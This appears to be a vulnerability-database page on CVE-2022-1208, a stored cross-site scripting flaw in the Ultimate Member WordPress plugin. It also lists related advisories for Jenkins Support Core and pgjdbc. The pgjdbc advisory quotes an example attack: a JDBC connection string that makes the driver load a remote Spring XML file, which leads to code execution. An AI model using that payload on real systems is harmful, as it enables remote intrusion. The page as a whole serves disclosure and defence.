CVE-2022-1208
published 2022-06-13CVE-2022-1208: The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile pages due to…
PriorityP423medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.87%
54.3th percentile
The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile pages due to insufficient input sanitization and output escaping that allows users to encode malicious web scripts with HTML encoding that is reflected back on the page. This affects versions up to, and including, 2.3.2. Please note this issue was only partially fixed in version 2.3.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ultimatemember | ultimate_member | <= 2.3.2 | — |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Incorrect permission checks in Jenkins Support Core Plugin
ghsa·2022-11-16
CVE-2022-45383 [MEDIUM] CWE-276 Incorrect permission checks in Jenkins Support Core Plugin
Incorrect permission checks in Jenkins Support Core Plugin
Support Core Plugin defines the permission Support/DownloadBundle that allows users without Overall/Administer permission to create and download support bundles containing a limited set of diagnostic information.
Support Core Plugin 1206.v14049fa_b_d860 and earlier does not correctly perform permission checks in several HTTP endpoints.
This allows attackers with Support/DownloadBundle permission to download a previously created support bundle containing information limited to users with Overall/Administer permission.
Support Core Plugin 1206.1208.v9b_7a_1d48db_0f deprecates the Support/DownloadBundle permission. The Overall/Administer permission is now required to download support bundles.
GHSA
GHSA-v6w4-v9mr-x4m3: The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile page
ghsa_unreviewed·2022-06-14
CVE-2022-1208 [MEDIUM] CWE-79 GHSA-v6w4-v9mr-x4m3: The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile page
The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile pages due to insufficient input sanitization and output escaping that allows users to encode malicious web scripts with HTML encoding that is reflected back on the page. This affects versions up to, and including, 2.3.2. Please note this issue was partially fixed in version 2.3.2 then subsequently fully patched in version 2.3.3.
GHSA
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
ghsa·2022-02-02
CVE-2022-21724 [HIGH] CWE-665 pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
### Impact
pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
```
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
```
The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/H4de5-7/vulnerabilities/blob/main/Ultimate%20Member%20%3C%3D%202.3.1%20-%20Stored%20Cross-Site%20Scripting.mdhttps://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2735896%40ultimate-member&new=2735896%40ultimate-member&sfp_email=&sfph_mail=https://www.wordfence.com/threat-intel/vulnerabilities/id/93cf6dce-892e-4106-bb37-b7952e5ea5a1?source=cvehttps://www.wordfence.com/vulnerability-advisories/#CVE-2022-1208https://github.com/H4de5-7/vulnerabilities/blob/main/Ultimate%20Member%20%3C%3D%202.3.1%20-%20Stored%20Cross-Site%20Scripting.mdhttps://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2735896%40ultimate-member&new=2735896%40ultimate-member&sfp_email=&sfph_mail=https://www.wordfence.com/threat-intel/vulnerabilities/id/93cf6dce-892e-4106-bb37-b7952e5ea5a1?source=cvehttps://www.wordfence.com/vulnerability-advisories/#CVE-2022-1208
2022-06-13
Published